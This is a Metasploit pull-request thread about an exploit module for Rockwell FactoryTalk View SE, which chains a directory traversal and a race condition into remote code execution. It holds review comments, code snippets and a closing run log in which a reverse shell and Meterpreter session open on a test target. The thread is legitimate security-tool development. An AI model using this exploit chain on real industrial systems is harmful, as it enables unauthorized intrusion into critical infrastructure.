Rockwell4real
rapid7/metasploit-framework pull request #14206
Opened 2020-10-01 04:05 UTC by pedrib

This adds an exploit for Rockwell FactoryTalk View SE 2020.
The module chains 5 vulnerabilities to drop a file in the IIS server directory, resulting in command execution as SYSTEM.
CVE-2020-12027/8/9 have been attributed to these vulns.

This is attempt #2 to merge due to a mistake of mine, see #13960 
I already sent you a pcap, please let me know if you still have it!

cc @rdomanski

2020-10-01 04:26 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +        'Privileged' => false,
If the exploit gain `SYSTEM` privileges:

```suggestion
        'Privileged' => true,
```

2020-10-01 04:26 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +  end
`return Exploit::CheckCode::Detected unless version.length == 4` will return `CheckCode::Detected` for any web server that responds with a 200 status code.

`CheckCode::Appears` is returned only for a specific version. Presumably `CheckCode::Detected` should also be returned if a version was found, but was not `11.00.00.230`.

2020-10-01 04:26 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +      begin
`begin` appears to be redundant with a `rescue`.

2020-10-01 04:26 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +    end
```suggestion
    while count < datastore['SLEEP_RACER']
      break if racer.status == false
      sleep(1)
      count += 1
    end
```

2020-10-01 04:26 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +    end
Rather than use `@proj_name` for flow control, and also overwrite it within the loop, it would make more sense to set the project name and break out of the loop only if the project name is found.

```suggestion
    print_status("#{peer} - Received list of projects from the server")
    @proj_name = nil
    proj_path = ''
    xml = res.get_xml_document

    # Parse XML project list and check each project for installation project path
    xml.search('HMIProject').each do |project|
      # Infoleak 2 (project installation path)
      # In the original exploit, we used this to calculate the directory traversal path, but
      # Google says the path is the same for all versions since at least 2007.
      # Let's still abuse it to check if the project is valid.
      url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}"
      res = send_to_factory(url)

      proj_path = res.body.strip

      # Check if response contains :\ that indicates a windows path
      next unless proj_path.include?(":\\")
      print_status("#{peer} - Found project path: #{proj_path}")

      # We only need first hit so we can quit the project parsing once we get it
      @proj_name = project.attributes['Name']
      break
    end
```

2020-10-01 04:26 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +  end
```suggestion
  def send_to_factory(uri)
    send_request_cgi({
      'uri' => normalize_uri(target_uri, uri),
      'method' => 'GET'
    })
  end
```

2020-10-02 02:57 UTC, pedrib commented
I'll have a bit of free time on the weekend and I'll give it these final shakes.

2020-10-05 16:34 UTC, pedrib commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +        'Privileged' => false,
Nope, that's not correct, it runs as the IIS user

2020-10-12 07:30 UTC, pedrib commented
guys this is ready to ship! docs have been created, module has been tested with the requested changes!

2020-10-15 05:49 UTC, pedrib commented
heeellllooooo

2020-10-16 22:37 UTC, gwillcox-r7 commented
Heyo @pedrib sorry for the delay. As you might have seen there are a number of PRs that haven't gotten any work on them lately. This is due to ongoing work on the annual Metasploit CTF event, which is currently taking up most of our team's time and is the reason why PR's work may seem to be in a stand still at the moment.

2020-10-16 22:43 UTC, ccondon-r7 commented
Howdy @pedrib! Good to see you in the queue as always! We've got a lot in the old backlog at the moment—let me reach out to one of the other community committers to see if somebody can get to you sooner than we can right now. @timwr would you be able to hop in here, by chance?

2020-10-17 09:57 UTC, pedrib commented
@ccondon-r7 no worries, actually not in a rush, if you guys are busy I can wait. This has been out for a while anyway... let me know when you can pull it, and if you need anything else. But again, no rush!

2020-10-19 01:21 UTC, ccondon-r7 commented
@pedrib Will do, thanks for your patience! Tim might have some bandwidth to help.

2020-10-28 17:38 UTC, gwillcox-r7 commented
@pedrib Sorry for the delay, we should be more free to look into this now. Going to take a look over this and the previous PR so long and I'll let you know if there are any changes that need to be done still.

2020-10-28 17:59 UTC, gwillcox-r7 commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +        'Privileged' => false,
Previously your description of this module in PR did actually say that it was getting code execution as SYSTEM, so this may have been a point of confusion. I have updated the PR description to note that it gains code execution as the IIS user.

2020-10-28 22:52 UTC, gwillcox-r7 requested changes, later dismissed
Overall code looks pretty good but I am concerned about a few areas where we seem to be trusting the server's response will contain certain elements. Also made some suggestions for where I thought we could maybe improve some explanations. Let me know if anything is confusing though and I'll be happy to help out.

2020-10-28 22:52 UTC, gwillcox-r7 commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +      url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}"
Just a thought but you should probably check if `project.attributes['Name']` exists before trying to add it into this string here just in case it has a value of `nil` or similar. Otherwise your indirectly implicitly trusting that Nokogiri will be setting this value correctly for you and that the response will always contain this element.

2020-10-28 22:57 UTC, gwillcox-r7 commented
@pedrib Review is above, please also run `tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/scada/rockwell_factorytalk_rce.md` and attempt to fix as many errors as you can. You can safely ignore the warning about `## Options` if the module is only using default options.

2020-11-19 10:35 UTC, pedrib commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +    return Exploit::CheckCode::Safe unless res && res.code == 200
There's no return code here, and the body is empty...

2020-11-19 10:40 UTC, pedrib commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +      # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore...
Yes, according to my tests, didn't work

2020-11-19 10:42 UTC, pedrib commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +  end
Not relevant according to our tests, this scenario just doesn't happen

2020-11-19 10:52 UTC, pedrib commented on documentation/modules/exploit/windows/scada/rockwell_factorytalk_rce.md
> +The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request, the second is a directory traversal, and the third is a race co
This is all explained in the advisory, too complex to explain here.

2020-11-19 10:58 UTC, pedrib commented
@gwillcox-r7 all comments addressed; I have tested this on a live target and works like a charm.

2020-11-19 11:28 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +      print_status("#{peer} - Detected version #{version[0]}.#{version[1]}.#{version[2]}.#{version[3]}")
```suggestion
      print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
```

```
irb(main):001:0> version = "1.2.3.4.5.6".split('.')
=> ["1", "2", "3", "4", "5", "6"]
irb(main):002:0> puts "Detected version #{version[0..3].join('.')}"
Detected version 1.2.3.4
=> nil
irb(main):003:0> 
```

2020-11-19 11:28 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +    if version
This will die with a stack trace if the regex does not match.

```
irb(main):001:0> version = "asdf".match(/Version ([0-9\.]{5,})/)[1].split('.')
Traceback (most recent call last):
        4: from /usr/local/bin/irb:23:in `<main>'
        3: from /usr/local/bin/irb:23:in `load'
        2: from /var/lib/gems/2.7.0/gems/irb-1.2.7/exe/irb:11:in `<top (required)>'
        1: from (irb):1
NoMethodError (undefined method `[]' for nil:NilClass)
irb(main):002:0> 
```

Given that a length check `4` is performed afterwards, you can cast as string.

```
irb(main):001:0> version = "Version 1.2.3.4.5.6.7".match(/Version ([0-9\.]{5,})/)[1].split('.')
=> ["1", "2", "3", "4", "5", "6", "7"]
irb(main):002:0> version = "Version 1.2.3.4.5.6.7".scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')
=> ["1", "2", "3", "4", "5", "6", "7"]
irb(main):003:0> version = "asdf".scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')
=> []
irb(main):004:0> 
```

Then bail if the version array is empty.

```suggestion
    version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

    # Is returned version sound?
    unless version.empty?
```

2020-11-19 11:28 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +    return Exploit::CheckCode::Safe unless res && res.code == 200
> 
> 
> There's no return code here, and the body is empty...

You're comparing the return code `200` on this line and performing a regex match on the `body` a few lines later ...

I think gwillcox is suggesting that the `Checkcode::Unknown` code path should probably be `Checkcode::Safe`, and the version detection conditional block should be modified to return `CheckCode::Appears` if the version is `11.00.00.230` or `CheckCode::Detected` if it is not.

2020-11-19 12:52 UTC, pedrib commented
Guys come on, what's going on here? This module has been through review 3 times already by 3 different people @ccondon-r7 @gwillcox-r7 @smcintyre-r7 
@bcoles you already reviewed it in the original PR #13960 

This is really exhausting and not helping outside contributors, every new reviewer obviously will have something to point out, as everyone writes the module in a different way.

Not everyone has time to burn in this back and forth for weeks, re-testing the module on the target, etc.

And I'm not saying this in the heat of the moment, it seems to been happening more and more in every submission I make, and some reviewers are much more forgiving than others, it's really a lottery.

I do understand there's a standard of quality to keep for the modules to be integrated into the framework, but let's be honest, some of it it's nitpicking.

2020-11-19 13:41 UTC, pedrib commented
Let me just point out that I'm not singling out anyone here - I just tagged you guys because you all participated in the review process for this module at some point.

You are professional devs, I'm sure you have lots of processes for dealing with most stuff. However there doesn't appear to be a clear process for handling module submissions, it depends on a lot on the individual reviewers.

As you know, I have been contributing to the framework for years, and I find the review process is getting harder and more frustrating every time, consuming more and more of my time.
I don't think my modules are getting worse (even if they are not getting better), so there's a clear process failure here at some point, it shouldn't be getting harder, but getting easier and less frustrating.

Based on my experience, here are some suggestions that could improve this process immensely for outside contributors like me:

1. Only one person should review the module; no others should review it. If it's a second PR (resend, as in this case), or changes to an existing in-tree module, the same person who originally reviewed the PR / module should be the one reviewing it again.
2. All proposed changes should include the "Commit suggestion" button to make life easier for the contributor, all that is needed is to press a button if they agree, or comment if not.
3. All proposed changes should be tested by the reviewer beforehand. I'll admit that it's rare, but there have been occasions where proposed changes break the module functionality as they weren't clearly tested. If the reviewer cannot test the module (as in this case, since you don't have access to the vulnerable application), then changes that modify the logic, parsing, etc, should be kept at a minimum and only be proposed when absolutely necessary.

2020-11-19 13:53 UTC, timwr approved these changes
Looks OK to me.

2020-11-19 13:59 UTC, smcintyre-r7 commented
Thanks for your patience on this. I also really appreciate your process suggestions. I completely agree that your module should have retained the original reviewer and I think that was me so I apologize for not following up on the resubmission. You're right, modules really shouldn't have more than one or maybe two contributors providing the review because that does tend to lead to a lot of bike shedding.

The "Commit suggestion" button is pretty great and we could do a better job of using it. I don't think it's something that we can commit to doing (pun intended) for every suggestion though for the increased development effort that it would put on the reviewer who is often working on multiple reviews.

Testing feedback is another thing that we should be doing. I've noticed that sometimes we provide reviews that take into account hypothetical scenarios that are just not relevant to the exploitation process presumably due to our lack of familiarity with all the individual platforms and systems we see content for. Regardless, we shouldn't be making suggestions that will break functionality unless something needs to go against best practices for a non-obvious reason that's specific to the exploit. In this rare case, sometimes we just need some documentation (like a quick comment) to help us understand.

Again, I'm sorry this hasn't been a pleasant experience for you. It wasn't our intention to make it uncomfortable and I'll see what we can do for this particular submission today.

2020-11-19 14:13 UTC, bcoles commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +  end
Here's what I believe gwilcox was suggesting. I also raised this earlier. https://github.com/rapid7/metasploit-framework/pull/14206#discussion_r497973542

```suggestion
  def check
    res = send_to_factory('/hmi_isapi.dll')
    return CheckCode::Safe unless res && res.code == 200

    # Parse version from response body
    # Example: Version 11.00.00.230
    version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

    # Is returned version sound?
    if version.empty?
      return Checkcode::Safe
    end

    if version.length != 4
      return CheckCode::Detected
    end

    print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
    if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
      # we know this exact version is vulnerable (11.00.00.230)
      return CheckCode::Appears
    end

    CheckCode::Detected
  end
```

2020-11-19 14:15 UTC, bcoles commented
> 
> 
> Looks OK to me.

Me too, with the exception of the `check` method:

* https://github.com/rapid7/metasploit-framework/pull/14206#discussion_r497973542
* https://github.com/rapid7/metasploit-framework/pull/14206#discussion_r526792125

I've added a suggestion code review thing for point-and-click commit which may make the issue clearer:

* https://github.com/rapid7/metasploit-framework/pull/14206/files#r526917752

The current implementation returns `Detected` when the version array length is `4`, but returns `Unknown` when the version length *is* `4`, but doesn't match the known vulnerable version `11.00.00.230`.

`CheckCode::Unknown` is ranked lower in certainty than `CheckCode::Detected`.

That approach does not make sense and does not comply with the documented guidance on [implementing a `check` method](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method).

A version length that is not `4` is even less reliable as an indicator than a version which is `4` but doesn't match a known vulnerable version. `CheckCode::Detected` would make more sense.

2020-11-19 14:29 UTC, smcintyre-r7 commented on modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
> +  end
Fixed in commit a5024238d3a01adceb9615bcd0b695036baf47f5. The larger default is still Unknown though, but I think that's sufficient. If it says it detected Rockwell, it returns `CheckCode::Detected` now and that's the important thing.

2020-11-19 14:32 UTC, smcintyre-r7 commented
Once the unit tests pass, I'll go ahead and land this. They've been a bit slow so it may be a couple of hours. Thanks, everyone.

2020-11-19 14:37 UTC, pedrib commented
> The "Commit suggestion" button is pretty great and we could do a better job of using it. I don't think it's something that we can commit to doing (pun intended) for every suggestion though for the increased development effort that it would put on the reviewer who is often working on multiple reviews.

Thank you for taking my feedback into consideration. I do understand that you might want to tighten reviews to get code quality up, and that this might be the cause for the submissions to get harder and harder. 

However this is also huge burden to the contributors, as myself for example - I am a noob when it comes to Ruby, and you guys are professionals, so the "Commit suggestion" is IMO the best way to make sure the module is up to your coding standards.

Thanks for everything guys, I have tested the latest commit a502423 and it works perfectly on the target.

2020-11-19 14:39 UTC, pedrib commented
```
msf6 exploit(windows/scada/rockwell_factorytalk_rce) > recheck
[*] Reloading module...

[*] 192.168.227.129:80 - Detected Rockwell FactoryTalk View SE SCADA version 11.00.00.230
[*] 192.168.227.129:80 - The target appears to be vulnerable.
msf6 exploit(windows/scada/rockwell_factorytalk_rce) > run

[*] Started reverse TCP handler on 192.168.227.1:4444 
[*] 192.168.227.129:80 - Listing projects on the server
[*] 192.168.227.129:80 - Received list of projects from the server
[*] 192.168.227.129:80 - Found project path: C:\Users\Public\Documents\RSView Enterprise\SE\HMI Projects\FTViewDemo_HMI
[+] 192.168.227.129:80 - Got a path to drop our shell: C:\Users\Public\Documents\RSView Enterprise\SE\HMI Projects\
[*] 192.168.227.129:80 - Starting up our web service on http://192.168.227.1:8080 ...
[*] Using URL: http://192.168.227.1:8080/RSViewSE/
[*] 192.168.227.129:80 - Starting racer thread, let's win this race condition!
[*] 192.168.227.129:80 - Initiating project copy request...
[+] 192.168.227.129:80 - Target connected, sending file path with dir traversal
[+] 192.168.227.129:80 - Target connected, sending payload
[+] 192.168.227.129:80 - We've won the race condition, shell incoming!
[*] Sending stage (175174 bytes) to 192.168.227.129
[*] Meterpreter session 2 opened (192.168.227.1:4444 -> 192.168.227.129:49901) at 2020-11-19 21:34:03 +0700
[*] Server stopped.

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > shell
Process 11004 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.449]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\SysWOW64\inetsrv>
```

2020-11-20 13:50 UTC, merged

2020-11-20 13:52 UTC, smcintyre-r7 commented
# Release Notes
This adds an unauthenticated, remote exploit for Rockwell FactoryTalk View SE 2020. It combines three vulnerabilities identified as CVE-2020-12027, CVE-2020-12028, and CVE-2020-12029.